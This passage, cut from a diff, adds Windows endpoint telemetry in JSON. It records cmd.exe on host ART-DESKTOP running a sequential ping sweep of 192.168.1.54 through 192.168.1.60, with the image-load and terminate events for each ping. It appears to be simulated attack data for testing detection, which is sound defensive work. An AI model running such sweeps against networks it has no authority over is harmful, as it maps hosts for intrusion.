"unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.54", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572242020000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "process", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572246830000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.55", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3496, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572246980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3496, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "process", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572251830000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.56", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4796, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + 
"timestamp": 131883572251980000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572252140000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "process", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572256840000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.57", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "process", + 
"pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572261990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.58", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + 
"unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "process", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572266840000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.59", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4692, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572266990000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": 
"{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883572268869984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883572268869984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "process", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "subtype": "terminate", + "timestamp": 131883572268869984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "process", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": 
"C:\\Windows\\System32\\SearchFilterHost.exe", + "subtype": "terminate", + "timestamp": 131883572269020000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "process", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572271990000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.60", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572272140000, + "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" + }, + { + "event_type": "image_load", + "image_name": 